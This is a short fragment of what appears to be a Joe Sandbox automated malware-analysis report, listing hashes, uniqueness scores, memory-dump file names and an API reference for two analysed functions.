                                                              • Instruction ID: ef78355b55900c911780b8d34dfa8fcd2ab410a6cab1b27790f79adf7f761a92
                                                              • Opcode Fuzzy Hash: c320424a68c3df20d646742f71d08ec3ba8c4e9f288ffca69f2cbed2a8a6275e
                                                              • Instruction Fuzzy Hash: 52810A71D0126A9BDB258F94CC45BDEB7B8AB08750F0041DBEA19B7250D7709E94CFA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2029CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 2029CFBD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID: CallFilterFunc@8
                                                              • String ID: @$@4_w@4_w
                                                              • API String ID: 4062629308-713214301
                                                              • Opcode ID: 80ffbc30bd198da084b78b7e551132f7b2662def8cd53cdddadcd4f94a92acbe
                                                              • Instruction ID: 102f3870a32b56f9645a81c6c8731d6cfe6abebd1aef7535178804c8cd46f775
                                                              • Opcode Fuzzy Hash: 80ffbc30bd198da084b78b7e551132f7b2662def8cd53cdddadcd4f94a92acbe
                                                              • Instruction Fuzzy Hash: 19419F71901629DFCB218FD6DC80AADBBB9FF54714F20402BF904EB264D734A925DB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%